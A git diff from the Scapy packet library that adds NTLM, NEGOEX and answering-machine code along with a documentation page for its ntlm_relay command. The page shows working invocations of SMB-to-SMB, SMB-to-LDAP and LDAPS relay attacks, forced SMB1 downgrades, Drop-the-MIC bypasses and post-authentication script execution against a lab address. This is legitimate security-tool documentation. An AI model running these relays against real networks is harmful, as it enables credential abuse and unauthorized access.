zMb4qmJUst*^Ye3kZR1|}-8h`qhbRlvx8kZ_R-&WKFf9eypC_CC4;n!>K~7W69J@_-lZ7LsV}8h zZw+IALtth;_~@`{W{*d$p+K9T4Qb_(cOYT>FQA<_Oc%6)$Gb9YqPYlmt#2F3^dZh3 zKf4-nje;Q0+~Mf(H)}GFI9>dEl>Poi0ez|`=SZb~l?!_{tBB%`$ypo|4SCI9{2j`r{2*9iZqJsoE=T6{VYef^pUKMlu2}455FKu z7x()$7Nk=u9@`*1wxah<#ma?13lSGsF3LtQ#qR$gE7V8bns*O!^l$tTTQ) zadkc$toC)~Y5#;W$p;~Krob;^;wujTAtG>^FNH3nuqu{1aT8k0U}nu}s;@N?G}94< z6+eA)-%2Q$+*K^Y)S9c16i2B?DFK7txnX^^!2S7?SnQB+;G9A6Hx+{*TZQEQ`@Yf* z8gQbZ_5#uFGFO}vfstK|%nMRQ+Go~S+0o0gZWF=tcC>pd| z>4M)({NM5m>Gs-?&c^gBR!_JtvGt|=6N1`;X1~#@^Q0Tc_*PDJW|;K(cUQ$0O1-}b zW0K52`RxFOyMlhhW0H~a$fW&TvCu97tK zt0w}LZ~y>U?_8vMh_64JCl*h<>I2d=^nv8Mn=$oqbSMJ=FBtUU;D*?j>hd5J=1bfM zK5p2xwa|$qivui}i>$5}+C)|K^tq86YFQ~YxR$R94=Z4i!m!itfD!I|;vVKOh~j)L zHuvz|Y8s3nxO|$!+uz7{KAU8U(b5t0j=Zuku)?5iO*%E9Ka9)WQel50Vf5|2^K5D~ zV!koJC^&{Fg+NWHTYN z$)0mCniszEng;vg>zGL3H_c)I5a>@`LLr zB)BE#VPMD!K48$BZ>K%t0uad+$B@Lxl7&OM+5?jE zJ2du+ck4_b{{7jSo+VI#PpW-^Z6&ysxC!_3jT`>3&ALqB^u8tT0!2FPz&-HitbCyN z{jho}WGLu7*5;5!AH0y*UVy9ONMs&;SYVhtpIMX+i*Iw~samD5#5=Ko(BcyjsqL&O zTyg$;GPpZW*#HCL4&r320@QY=r{`4K(`+T;2gq8pZEnV}p{d<_n80ob821jFK77X) zUoJrEbpT}dpiA!kG&&VEH=UTGe~F9e|A&8HWZkcoSoIrooyo=o6^IYXAt^+y!LlJ? z0%N~9A@(|C-G%5FA|7F@){P*^56B}@(F`%vMRZnjS##X-_}2{z84d%B0J?LqZXOmH z7QvaW#q>2Qx>SU0SbB#nGL`buusKEVpj*-wt^?E+-WEAA1#$%d4FcZN4m16~k;|#? zzFVmuN5`pLWV7v(FVH!Xf{m*bQ(DBJ2FLg81fmqri>``5S*HOBUP69;oYO?PM+6Cy z(#DgrUIG1k6^7E1CKQx$SUjWNAmR1-*l8tro2`MSsd1QJA<8Q?M#SJv76dQ(v0lUV z@e04fFCa(JX~#Hl5_u7P5V%j)d-I9tnVT8_lx%jaxjVlKfLPnF8l)F~ zJ2=jg`VWGFR{cm5I9#0SBQgTH zx7hbeH4njr;ksy!_0Pv&OwO)f)ipWOM#1Fr*T{~u+K?3jTtUN<7ww(GH~A7`+{$ky zE#S2mDH-v(B!R{Ko3N>d?MjF%lvdtL9!J6(^CKFO(_iWPZ4d-jAsmRAI*{7UFQ5i0 zn2UE*SPn^!5BvF(%$^nDYm%y)3d6sJJ`ffR-ULwVI~;Hb{VI@Fe`6QjBwGm|B}y@F zF%ah)r{Z%rUl}(4Mx@x!xa((<23)7ue|aNcbM+IDYBtswZsVtc5tm!Q858)3ZJ*1b zUgOAcd{COexSuGATp#N2Ot6P_HNcG^O}VL`5N-(A4n z2zQdAIZJ?%z4O^Mxm^5GRysm(!y)Gmp#B8rL>qyN@|zJ)mXCa#=_dt&l%dB{J6(ga zSG!%6b>=b0TSadMhi>7>CqxbX$-$(6PZk$&3QHG)K9e%n5tZMi+a%qAA>FEniY%Utr&R9J_Z^UjMdFnvP@)$IK+db=PM) z+r$e=98RF#P3bZ96GJJT>-YP;sH*q%n`Ztuec&v-!y4|ju-Khuvjk>?uvn%iE7bbX z=mM)h9_7?@hx7(Dy^7qYvfWxS z&c5Uz{Cy(Pr=gm>P~MQh(ZBXg+kMVIe!{J}=N%1Y;+6gq^LXaPUi_s_%In|D_bw48 zirGfofdGR;w|e#Qn`<+cdT_0Oiy+_>Cy&E*C@9Ed3LF;Z#jlE-(gx=tzHmDPiV*wW%~$;gJfO|p zz7Xy5UIFe+_Yj zK^I2q#y)i^e=9Enk9>3mdm`m!P;eN9p%Dm7{SUPOfwdlM54O0oOJnTA^z0*E;hG+t z%*k&e9Jc9Z8VLWPV~|#)pV3{~9Mk#R>9j`6NEs|m`<&4YVq3?Byr6g(r!A@W{~~`# zX80WiBlxTV0u85>7M*9OR+=Q_7e;x+#P6MdM}h#}mUCuWNmfD(+urue^dV|YIZwk% zFd(|gcL2910$y8NTr~JbC3|>YAg3d-87%@9Acf}s8sVBA{nXf2&kWOV_Vu}Y zQ~2I#K2T?7!z~RbW`3 zCZo7!>1=T*1?6n+a)&~Zh^x=#NlQ|b5#sS(M2J#Gk{*1ngsU{2-7hB}E3m0A0bQvX zu-0~UVFSTKh+@+PZtRAEsJ%Rct>v*gLs_qA_&sKnIX^GTwaIfD90m4zCY2(Gcop@I z(&Y3g%nAD2dxNn@o|BUKdwl=IsiOuqj=B53BI)Iv2h2wN>wggsA!Q#{H4=aX9Sj?o z_H`0^lsAvUo~{lHkCVmA1@o8g-Wc)t{={UBC&@4SvENHl$WhW;%XUYe~D*IY8Z<1PD)`yiO8B|vss)pJ)}`<;P=P0 z97nftgpCY%`9_ikO_#Xu+(oZ?3D1s85{pfzBED;!!W5%y2iHNi;^$zpyL)#-mE2xX z+TR)<53w80p9FqYBs@EvC7uMedsmYhCpTe1h=?cZ-RAt8`*c{TmIda4 z8p_(3q~MhQN3gzUOOxHMdVH-uS=ANleWl&W^?v2zkXIXYj%u~9Spp+X-4K*IK=>nmmw`HZfj+s?c&RL z$`7X=vSfp?f4(Kc%i4Ef;ib%!NtC~@DCklKUdX#4R4lMMeW1r-Q)F3N?uYcjUkJ5;Y|izjef7bt;*TfFCBngKaFC3ky6k>8m}v~+qmdC; zgG^EM*@UUxB!0WRd|9$U)9CCUtApUSZ&-E9K(0#IQR5MdbW3vsqUJv!+)XvR;G>fO~!}Ns9edX!Az4QFGbf+BV6xMbG!;idIRJeRDL^!6Sz*FK8XWk=T5D51G{8K zxohCvS++PQsev_Cl$V1Sd0IEsivO7ODH>43oubj0*)wioX0=(~#zKT3z(TmR39M&!N}!k@s+4L(Ld Q{_=UqNGOU|ivIHZKRRQ-(f|Me literal 0 HcmV?d00001 diff --git a/doc/scapy/layers/index.rst b/doc/scapy/layers/index.rst index 5508057d578..c6139faf189 100644 --- a/doc/scapy/layers/index.rst +++ b/doc/scapy/layers/index.rst @@ -1,6 +1,10 @@ .. Layer-specific documentation +Layers +====== + .. toctree:: :glob: + :titlesonly: * \ No newline at end of file diff --git a/doc/scapy/layers/ntlm.rst b/doc/scapy/layers/ntlm.rst new file mode 100644 index 00000000000..6a2561e60ec --- /dev/null +++ b/doc/scapy/layers/ntlm.rst @@ -0,0 +1,128 @@ +NTLM +==== + +Scapy provides dissection & build methods for NTLM and other Windows mechanisms. +In particular, the ``ntlm_relay`` command allows to perform some NTLM relaying attacks. + +.. note:: + + Read `this article from hackndo `_ to understand how NTLM relay work and what we are trying to achieve here. + +Examples +-------- + + +**Requirement: Answer to all netbios requests with the local IP** + +.. code:: + + netbios_announce(iface="virbr0") + +SMB <-> SMB: SMB relay with force downgrade to SMB1 +___________________________________________________ + +.. note:: + + ``server_kwargs={"REAL_HOSTNAME":"WIN1"}`` is compulsory on SMB1 if the name that you are spoofing is different from the real name. Set this to avoid getting a ``STATUS_DUPLICATE_NAME`` + +.. code:: + + ntlm_relay(NTLM_SMB_Server, "192.168.122.156", NTLM_SMB_Client, iface="virbr0", ALLOW_SMB2=False, server_kwargs={"REAL_HOSTNAME":"WIN1"}) + +.. image:: ../graphics/ntlm/ntlmrelay_smb.png + :align: center + +.. image:: ../graphics/ntlm/ntlmrelay_smb_win1.png + :align: center + +.. image:: ../graphics/ntlm/ntlmrelay_smb_wireshark.png + :align: center + +.. image:: ../graphics/ntlm/ntlmrelay_smb_win2.png + :align: center + + +SMB <-> SMB: Perform a SMB2 relay - default +___________________________________________ + +.. code:: + + ntlm_relay(NTLM_SMB_Server, "192.168.122.156", NTLM_SMB_Client, iface="virbr0") + +.. warning:: + + The legitimate client will the validity of the negotiated flags by using a signed IOCTL ``FSCTL_VALIDATE_NEGOTIATE_INFO`` which we cannot fake, therefore losing the connection. + We however still have created an authenticated illegitimate client to the server, where we won't be performing that check, that we can use. See the case right below. + +SMB <-> SMB: Perform a SMB2 relay - scripted +____________________________________________ + +Because of the note above, we now close the legitimate client & run commands on the server directly. + +.. note:: + + Setting ``ECHO`` to ``False`` on the server instantly terminates the connection once Authentication is successful. + We set ``RUN_SCRIPT`` to ``True`` to run a script (in ``DO_RUN_SCRIPT`` in the automaton) once Authentication is successful. Note that ``REAL_HOSTNAME`` is required in this case. + +.. code:: + + ntlm_relay(NTLM_SMB_Server, "192.168.122.156", NTLM_SMB_Client, iface="virbr0", server_kwargs={"ECHO": False}, client_kwargs={"REAL_HOSTNAME": "WIN1", "RUN_SCRIPT": True}) + +.. image:: ../graphics/ntlm/ntlmrelay_smb2.png + :align: center + +SMB <-> SMB: SMB relay with force downgrade to SMB1 & drop NEGOEX +_________________________________________________________________ + +This example points out that the NEGOEX messages are optional: dropping them has no effect on the SMB1 connection. + +.. code:: + + ntlm_relay(NTLM_SMB_Server, "192.168.122.156", NTLM_SMB_Client, iface="virbr0", ALLOW_SMB2=False, server_kwargs={"PASS_NEGOEX": False, "REAL_HOSTNAME":"WIN1"}) + +SMB <-> SMB: SMB relay with force downgrade to SMB1 & drop extended security +____________________________________________________________________________ + +This probably won't work. SMB1 clients abort unextended connections these days. + +.. code:: + + ntlm_relay(NTLM_SMB_Server, "192.168.122.156", NTLM_SMB_Client, iface="virbr0", ALLOW_SMB2=False, server_kwargs={"REAL_HOSTNAME":"WIN1"}, DROP_EXTENDED_SECURITY=True) + +SMB2 <-> LDAP: relay SMB's NTLM to an LDAP server +_________________________________________________ + +.. note:: + + Negotiating LDAP using SMB's credentials does work, but sets the ``SIGN`` field during the NTLM exchange. This causes LDAP to require signing. Read `the HackNDo article ` for more info. + +.. code:: + + load_layer("ldap") + ntlm_relay(NTLM_SMB_Server, "192.168.122.156", NTLM_LDAP_Client, iface="virbr0") + +.. image:: ../graphics/ntlm/ntlmrelay_ldap.png + :align: center + +Let's try using DROP-THE-MIC-v1 or DROP-THE-MIC-v2: + +.. code:: + + load_layer("ldap") + ntlm_relay(NTLM_SMB_Server, "192.168.122.156", NTLM_LDAP_Client, iface="virbr0", DROP_MIC_v1=True) + +.. code:: + + load_layer("ldap") + ntlm_relay(NTLM_SMB_Server, "192.168.122.156", NTLM_LDAP_Client, iface="virbr0", DROP_MIC_v2=True) + +SMB2 <-> LDAPS: relay SMB's NTLM to an LDAPS server +___________________________________________________ + +.. code:: + + load_layer("ldap") + ntlm_relay(NTLM_SMB_Server, "192.168.122.156", NTLM_LDAPS_Client, iface="virbr0") + +.. image:: ../graphics/ntlm/ntlmrelay_ldaps.png + :align: center diff --git a/scapy/ansmachine.py b/scapy/ansmachine.py index dabb017f7ba..a6eb993244f 100644 --- a/scapy/ansmachine.py +++ b/scapy/ansmachine.py @@ -11,13 +11,13 @@ # Answering machines # ######################## -from __future__ import absolute_import -from __future__ import print_function - +import functools +import socket import warnings +from scapy.arch import get_if_addr from scapy.config import conf -from scapy.sendrecv import send, sniff +from scapy.sendrecv import send, sniff, AsyncSniffer from scapy.packet import Packet from scapy.plist import PacketList @@ -25,6 +25,7 @@ from scapy.compat import ( Any, + Callable, Dict, Generic, _Generic_metaclass, @@ -145,9 +146,12 @@ def make_reply(self, req): # type: (Packet) -> _T return req - def send_reply(self, reply): - # type: (_T) -> None - self.send_function(reply, **self.optsend) + def send_reply(self, reply, send_function=None): + # type: (_T, Optional[Callable[..., None]]) -> None + if send_function: + send_function(reply) + else: + self.send_function(reply, **self.optsend) def print_reply(self, req, reply): # type: (Packet, _T) -> None @@ -157,12 +161,22 @@ def print_reply(self, req, reply): else: print("%s ==> %s" % (req.summary(), reply.summary())) - def reply(self, pkt): - # type: (Packet) -> None + def reply(self, pkt, send_function=None, address=None): + # type: (Packet, Optional[Callable[..., None]], Optional[Any]) -> None if not self.is_request(pkt): return - reply = self.make_reply(pkt) - self.send_reply(reply) + if address: + # Only on AnsweringMachineTCP + reply = self.make_reply(pkt, address=address) # type: ignore + else: + reply = self.make_reply(pkt) + if not reply: + return + if send_function: + self.send_reply(reply, send_function=send_function) + else: + # Retro-compability. Remove this if eventually + self.send_reply(reply) if self.verbose: self.print_reply(pkt, reply) @@ -212,3 +226,53 @@ def reverse_packet(req): if req.haslayer(Ether): reply[Ether].src, reply[Ether].dst = req[Ether].dst, req[Ether].src return reply + + +class AnsweringMachineTCP(AnsweringMachine[Packet]): + """ + An answering machine that use the classic socket.socket to + answer multiple clients + """ + def parse_options(self, port=80, cls=conf.raw_layer): + # type: (int, Type[Packet]) -> None + self.port = port + self.cls = conf.raw_layer + + def close(self): + # type: () -> None + pass + + def sniff(self): + # type: () -> None + from scapy.supersocket import StreamSocket + ssock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + ssock.bind( + (get_if_addr(self.optsniff.get("iface", conf.iface)), self.port)) + ssock.listen() + sniffers = [] + try: + while True: + clientsocket, address = ssock.accept() + print("%s connected" % repr(address)) + sock = StreamSocket(clientsocket, self.cls) + optsniff = self.optsniff.copy() + optsniff["prn"] = functools.partial(self.reply, + send_function=sock.send, + address=address) + del optsniff["iface"] + sniffer = AsyncSniffer(opened_socket=sock, **optsniff) + sniffer.start() + sniffers.append((sniffer, sock)) + finally: + for (sniffer, sock) in sniffers: + try: + sniffer.stop() + except Exception: + pass + sock.close() + self.close() + ssock.close() + + def make_reply(self, req, address=None): + # type: (Packet, Optional[Any]) -> Packet + return super(AnsweringMachineTCP, self).make_reply(req) diff --git a/scapy/asn1/asn1.py b/scapy/asn1/asn1.py index 34d587a11d7..f282ee6b377 100644 --- a/scapy/asn1/asn1.py +++ b/scapy/asn1/asn1.py @@ -359,6 +359,10 @@ def __ne__(self, other): # type: (Any) -> bool return bool(self.val != other) + def command(self): + # type: () -> str + return "%s(%s)" % (self.__class__.__name__, repr(self.val)) + ####################### # ASN1 objects # diff --git a/scapy/automaton.py b/scapy/automaton.py index 414984e1cc0..3270524b7fe 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -998,7 +998,7 @@ def _do_control(self, ready, *args, **kargs): self.cmdout.send(c) except Exception as e: exc_info = sys.exc_info() - self.debug(3, "Transferring exception from tid=%i:\n%s" % (self.threadid, traceback.format_exception(*exc_info))) # noqa: E501 + self.debug(3, "Transferring exception from tid=%i:\n%s" % (self.threadid, "".join(traceback.format_exception(*exc_info)))) # noqa: E501 m = Message(type=_ATMT_Command.EXCEPTION, exception=e, exc_info=exc_info) # noqa: E501 self.cmdout.send(m) self.debug(3, "Stopping control thread (tid=%i)" % self.threadid) @@ -1181,15 +1181,17 @@ def _flush_inout(self): for fd in r: fd.recv() - def stop(self): - # type: () -> None + def stop(self, wait=True): + # type: (bool) -> None self.cmdin.send(Message(type=_ATMT_Command.STOP)) - self._flush_inout() + if wait: + self._flush_inout() - def forcestop(self): - # type: () -> None + def forcestop(self, wait=True): + # type: (bool) -> None self.cmdin.send(Message(type=_ATMT_Command.FORCESTOP)) - self._flush_inout() + if wait: + self._flush_inout() def restart(self, *args, **kargs): # type: (Any, Any) -> None diff --git a/scapy/config.py b/scapy/config.py index 4f13152ec17..db576fe46d9 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -835,6 +835,7 @@ class Conf(ConfClass): 'mobileip', 'netbios', 'netflow', + 'ntlm', 'ntp', 'ppi', 'ppp', diff --git a/scapy/contrib/automotive/ecu.py b/scapy/contrib/automotive/ecu.py index 461fdcb6e42..a79cf989ff3 100644 --- a/scapy/contrib/automotive/ecu.py +++ b/scapy/contrib/automotive/ecu.py @@ -661,8 +661,8 @@ def make_reply(self, req): return PacketList([self._basecls( b"\x7f" + bytes(req)[0:1] + b"\x10")]) - def send_reply(self, reply): - # type: (PacketList) -> None + def send_reply(self, reply, send_function=None): + # type: (PacketList, Optional[Any]) -> None """ Sends all Packets of a EcuResponse object. This allows to send multiple packets up on a request. If the list contains more than one packet, diff --git a/scapy/contrib/dce_rpc.py b/scapy/contrib/dce_rpc.py index 651a9c4c7d0..486ae83afc4 100644 --- a/scapy/contrib/dce_rpc.py +++ b/scapy/contrib/dce_rpc.py @@ -24,11 +24,19 @@ import struct -# TODO: namespace locally used fields from scapy.packet import Packet, Raw, bind_layers -from scapy.fields import BitEnumField, ByteEnumField, ByteField, \ - FlagsField, IntField, LenField, ShortField, UUIDField, XByteField, \ - XShortField +from scapy.fields import ( + BitEnumField, + ByteEnumField, + ByteField, + FlagsField, + IntField, + LenField, + ShortField, + UUIDField, + XByteField, + XShortField, +) # Fields diff --git a/scapy/contrib/opc_da.py b/scapy/contrib/opc_da.py index 80261bc03fe..e045d4c0d08 100644 --- a/scapy/contrib/opc_da.py +++ b/scapy/contrib/opc_da.py @@ -39,9 +39,6 @@ [MS-DCOM]: Distributed Component Object Model (DCOM) Remote Protocol https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dcom/4a893f3d-bd29-48cd-9f43-d9777a4415b0 XXX TODO: does not appear to have been linked to RPC - -NT LAN Manager (NTLM) Authentication Protocol -https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nlmp/b38c36ed-2804-4868-a9ff-8dd3182128e4 """ import struct @@ -70,12 +67,12 @@ StrField, StrFixedLenField, StrLenField, - ThreeBytesField, UUIDField, _FieldContainer, _PacketField, ) from scapy.packet import Packet +from scapy.layers.ntlm import NTLM_Header # Defined values _tagOPCDataSource = { @@ -653,68 +650,10 @@ def extract_padding(self, p): AV_PAIRLE = _make_le(AV_PAIR) -class NTLMSSP(Packet): - # [MS-NLMP] v16.2 sect 2.2.1 - name = 'NTLM Authentication Protocol' - deprecated_fields_desc = { - 'identifier': ('signature', '2.5.0'), - } - fields_desc = [ - StrFixedLenField('signature', b'NTLMSSP\0', length=8), - IntEnumField('messageType', 3, {1: 'NEGOTIATE_MESSAGE', - 2: 'CHALLENGE_MESSAGE', - 3: 'AUTHENTICATE_MESSAGE'}), - # TODO: ONLY AUTHENTICATE_MESSAGE IMPLEMENTED - # sect 2.2.1.3 - ShortField('lmChallengeResponseLen', 0), - ShortField('lmChallengeResponseMaxLen', 0), - IntField('lmChallengeResponseBufferOffset', 0), - ShortField('ntChallengeResponseLen', 0), - ShortField('ntChallengeResponseMaxLen', 0), - IntField('ntChallengeResponseBufferOffset', 0), - ShortField('domainNameLen', 0), - ShortField('domainNameMax', 0), - IntField('domainNameOffset', 0), - ShortField('userNameLen', 0), - ShortField('userNameMax', 0), - IntField('userNameOffset', 0), - ShortField('workstationLen', 0), - ShortField('workstationMaxLen', 0), - IntField('workstationBufferOffset', 0), - ShortField('encryptedRandomSessionKeyLen', 0), - ShortField('encryptedRandomSessionKeyMaxLen', 0), - IntField('encryptedRandomSessionKeyBufferOffset', 0), - FlagsField('negociateFlags', 0, 32, _negociate_flags), - ByteField('productMajorVersion', 0), - ByteField('productMinorVersion', 0), - ShortField('productBuild', 0), - ThreeBytesField('reserved', 0), - ByteField('NTLMRevisionCurrent', 0), - StrFixedLenField('MIC', '', 16), - # payload field. - # TODO: those challenges are structures that should be defined - StrLenField('lmChallengeResponse', '', - length_from=lambda pkt: pkt.lmChallengeResponseLen), - StrLenField('ntChallengeResponse', '', - length_from=lambda pkt: pkt.ntChallengeResponseLen), - StrLenField('domainName', '', - length_from=lambda pkt: pkt.domainNameLen), - StrLenField('userName', '', - length_from=lambda pkt: pkt.userNameLen), - StrLenField('workstation', '', - length_from=lambda pkt: pkt.workstationLen), - StrLenField('encryptedRandomSessionKey', '', - length_from=lambda pkt: pkt.encryptedRandomSessionKeyLen) - ] - - def extract_padding(self, p): - return b"", p - - -NTLMSSPLE = _make_le(NTLMSSP) +# NTLM _opcDa_auth_classes = { - 10: [NTLMSSP, NTLMSSPLE], + 10: [NTLM_Header, NTLM_Header], } diff --git a/scapy/fields.py b/scapy/fields.py index 70a1a4d9d54..6e93e2a19f5 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -39,7 +39,6 @@ from scapy.base_classes import Gen, Net, BasePacket, Field_metaclass from scapy.error import warning import scapy.modules.six as six -from scapy.modules.six.moves import range from scapy.modules.six import integer_types # Typing imports @@ -1022,7 +1021,7 @@ def __init__(self, name, default, sz): def i2m(self, pkt, x): # type: (Optional[Packet], Optional[int]) -> List[int] if x is None: - return [] + return [0] * self.sz x2m = list() for _ in range(self.sz): x2m.append(x % 256) @@ -1384,10 +1383,10 @@ def i2repr(self, pkt, x): def i2h(self, pkt, x): # type: (Optional[Packet], bytes) -> str - return bytes_encode(x).decode('utf-16') + return bytes_encode(x).decode('utf-16', errors="replace") -K = TypeVar('K', List[BasePacket], BasePacket) +K = TypeVar('K', List[BasePacket], BasePacket, Optional[BasePacket]) class _PacketField(_StrField[K]): @@ -1439,7 +1438,7 @@ class PacketField(_PacketField[BasePacket]): pass -class PacketLenField(PacketField): +class PacketLenField(_PacketField[Optional[BasePacket]]): __slots__ = ["length_from"] def __init__(self, @@ -1456,14 +1455,16 @@ def getfield(self, pkt, # type: Packet s, # type: bytes ): - # type: (...) -> Tuple[bytes, Packet] + # type: (...) -> Tuple[bytes, Optional[Packet]] len_pkt = self.length_from(pkt) - try: - i = self.m2i(pkt, s[:len_pkt]) - except Exception: - if conf.debug_dissector: - raise - i = conf.raw_layer(load=s[:len_pkt]) + i = None + if len_pkt: + try: + i = self.m2i(pkt, s[:len_pkt]) + except Exception: + if conf.debug_dissector: + raise + i = conf.raw_layer(load=s[:len_pkt]) return s[len_pkt:], i @@ -1848,30 +1849,8 @@ def m2i(self, pkt, x): return x[:: -1] -class StrLenFieldUtf16(StrLenField): - def h2i(self, pkt, x): - # type: (Optional[Packet], Optional[str]) -> bytes - return plain_str(x).encode('utf-16')[2:] - - def any2i(self, pkt, x): - # type: (Optional[Packet], Any) -> bytes - if isinstance(x, six.text_type): - return self.h2i(pkt, x) - return super(StrLenFieldUtf16, self).any2i(pkt, x) - - def i2repr(self, pkt, x): - # type: (Optional[Packet], bytes) -> str - try: - return plain_str(self.i2h(pkt, x)) - except ValueError: - return plain_str(x) + " [invalid encoding]" - - def i2h(self, - pkt, # type: Optional[Packet] - x, # type: bytes - ): - # type: (...) -> str - return bytes_encode(x).decode('utf-16') +class StrLenFieldUtf16(StrLenField, StrFieldUtf16): + pass class BoundStrLenField(StrLenField): @@ -2350,16 +2329,17 @@ def __init__(self, s2i = self.s2i = {} self.i2s_cb = None self.s2i_cb = None + keys = [] # type: List[I] if isinstance(enum, list): - keys = list(range(len(enum))) + keys = list(range(len(enum))) # type: ignore elif isinstance(enum, DADict): keys = enum.keys() else: - keys = list(enum) + keys = list(enum) # type: ignore if any(isinstance(x, str) for x in keys): i2s, s2i = s2i, i2s # type: ignore for k in keys: - value = cast(str, enum[k]) + value = cast(str, enum[k]) # type: ignore i2s[k] = value s2i[value] = k Field.__init__(self, name, default, fmt) @@ -2487,6 +2467,12 @@ def __init__(self, name, default, enum): EnumField.__init__(self, name, default, enum, " None + EnumField.__init__(self, name, default, enum, " None @@ -2758,6 +2744,18 @@ def __or__(self, other): # type: (int) -> FlagValue return self.__class__(self.value | self._fixvalue(other), self.names) __ror__ = __or__ + __add__ = __or__ # + is an alias for | + + def __sub__(self, other): + # type: (int) -> FlagValue + return self.__class__( + self.value & (2 ** len(self.names) - 1 - self._fixvalue(other)), + self.names + ) + + def __xor__(self, other): + # type: (int) -> FlagValue + return self.__class__(self.value ^ self._fixvalue(other), self.names) def __lshift__(self, other): # type: (int) -> int @@ -3230,7 +3228,7 @@ def __init__(self, def i2repr(self, pkt, x): # type: (Optional[Packet], float) -> str if x is None: - x = -self.delta + x = time.time() - self.delta elif self.use_msec: x = x / 1e3 elif self.use_micro: @@ -3245,7 +3243,18 @@ def i2repr(self, pkt, x): def i2m(self, pkt, x): # type: (Optional[Packet], Optional[float]) -> int - return int(x) if x is not None else 0 + if x is None: + x = time.time() + if self.use_msec: + x = x * 1e3 + elif self.use_micro: + x = x * 1e6 + elif self.use_nano: + x = x * 1e9 + elif self.custom_scaling: + x = x * self.custom_scaling + return int(x) - self.delta + return int(x) class SecondsIntField(Field[float, int]): @@ -3544,7 +3553,7 @@ def any2i(self, u = self.m2i(pkt, bytes_encode(x)) else: u = UUID(plain_str(x)) - elif isinstance(x, UUID): + elif isinstance(x, (UUID, RandUUID)): u = x else: return None @@ -3556,6 +3565,26 @@ def randval(): return RandUUID() +class UUIDEnumField(UUIDField, _EnumField[UUID]): + __slots__ = EnumField.__slots__ + + def __init__(self, name, default, enum, uuid_fmt=0): + # type: (str, Optional[int], Any, int) -> None + _EnumField.__init__(self, name, default, enum, "16s") # type: ignore + UUIDField.__init__(self, name, default, uuid_fmt=uuid_fmt) + + def any2i(self, pkt, x): + # type: (Optional[Packet], Any) -> UUID + return _EnumField.any2i(self, pkt, x) # type: ignore + + def i2repr(self, + pkt, # type: Optional[Packet] + x, # type: UUID + ): + # type: (...) -> Any + return _EnumField.i2repr(self, pkt, x) + + class BitExtendedField(Field[Optional[int], bytes]): """ Bit Extended Field diff --git a/scapy/layers/dhcp6.py b/scapy/layers/dhcp6.py index 19a40fab939..339862c4e49 100644 --- a/scapy/layers/dhcp6.py +++ b/scapy/layers/dhcp6.py @@ -33,7 +33,6 @@ IPv6 from scapy.packet import Packet, bind_bottom_up from scapy.pton_ntop import inet_pton -from scapy.sendrecv import send from scapy.themes import Color from scapy.utils6 import in6_addrtovendor, in6_islladdr import scapy.modules.six as six @@ -1380,7 +1379,6 @@ def answers(self, other): class DHCPv6_am(AnsweringMachine): function_name = "dhcp6d" filter = "udp and port 546 and port 547" - send_function = staticmethod(send) def usage(self): msg = """ diff --git a/scapy/layers/gssapi.py b/scapy/layers/gssapi.py index 4b6f66bcd1d..11a51614fef 100644 --- a/scapy/layers/gssapi.py +++ b/scapy/layers/gssapi.py @@ -9,8 +9,12 @@ Implements parts of - GSSAPI: RFC2743 - GSSAPI SPNEGO: RFC4178 > RFC2478 +- GSSAPI SPNEGO NEGOEX: [MS-NEGOEX] """ +import struct +from uuid import UUID + from scapy.asn1.asn1 import ASN1_SEQUENCE, ASN1_Class_UNIVERSAL, ASN1_Codecs from scapy.asn1.ber import BERcodec_SEQUENCE from scapy.asn1.mib import conf # loads conf.mib @@ -26,7 +30,34 @@ ASN1F_optional ) from scapy.asn1packet import ASN1_Packet -from scapy.layers.ntlm import NTLM_Header +from scapy.fields import ( + FieldListField, + LEIntEnumField, + LEIntField, + LELongEnumField, + LELongField, + LEShortField, + MultipleTypeField, + PacketField, + PacketListField, + StrFixedLenField, + UUIDEnumField, + UUIDField, + StrField, + XStrFixedLenField, + XStrLenField +) +from scapy.layers.ntlm import ( + NEGOEX_EXCHANGE_NTLM, + NTLM_Header, + _NTLMPayloadField, +) +from scapy.packet import Packet, bind_layers + +from scapy.compat import ( + Dict, + Tuple, +) # https://datatracker.ietf.org/doc/html/rfc1508#page-48 @@ -64,17 +95,20 @@ class SPNEGO_MechTypes(ASN1_Packet): class SPNEGO_MechListMIC(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_STRING("value", "") + ASN1_root = ASN1F_SEQUENCE(ASN1F_STRING("value", "")) _mechDissector = { "1.3.6.1.4.1.311.2.2.10": NTLM_Header, # NTLM + # "1.2.840.113554.1.2.2": ... # Kerberos 5 } class _SPNEGO_Token_Field(ASN1F_STRING): def i2m(self, pkt, x): - return super().i2m(pkt, bytes(x)) + if x is None: + x = b"" + return super(_SPNEGO_Token_Field, self).i2m(pkt, bytes(x)) def m2i(self, pkt, s): dat, r = super(_SPNEGO_Token_Field, self).m2i(pkt, s) @@ -114,11 +148,11 @@ class SPNEGO_negTokenInit(ASN1_Packet): ASN1F_FLAGS("reqFlags", None, _ContextFlags, implicit_tag=0x81)), ASN1F_optional( - ASN1F_PACKET("mechToken", SPNEGO_Token(), SPNEGO_Token, + ASN1F_PACKET("mechToken", None, SPNEGO_Token, explicit_tag=0xa2) ), ASN1F_optional( - ASN1F_PACKET("mechListMIC", SPNEGO_MechListMIC(), + ASN1F_PACKET("mechListMIC", None, SPNEGO_MechListMIC, implicit_tag=0xa3) ) @@ -147,12 +181,12 @@ class SPNEGO_negTokenResp(ASN1_Packet): explicit_tag=0xa1), ), ASN1F_optional( - ASN1F_PACKET("responseToken", SPNEGO_Token(), + ASN1F_PACKET("responseToken", None, SPNEGO_Token, explicit_tag=0xa2) ), ASN1F_optional( - ASN1F_PACKET("mechListMIC", SPNEGO_MechListMIC(), + ASN1F_PACKET("mechListMIC", None, SPNEGO_MechListMIC, implicit_tag=0xa3) ) @@ -173,6 +207,207 @@ class SPNEGO_negToken(ASN1_Packet): implicit_tag=0xa1) ) +# NEGOEX +# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-negoex/0ad7a003-ab56-4839-a204-b555ca6759a2 + + +_NEGOEX_AUTH_SCHEMES = { + # Reversed. Is there any doc related to this? + # The NEGOEX doc is very ellusive + UUID("5c33530d-eaf9-0d4d-b2ec-4ae3786ec308"): "UUID('[NTLM-UUID]')", +} + + +class NEGOEX_MESSAGE_HEADER(Packet): + fields_desc = [ + StrFixedLenField("Signature", "NEGOEXTS", length=8), + 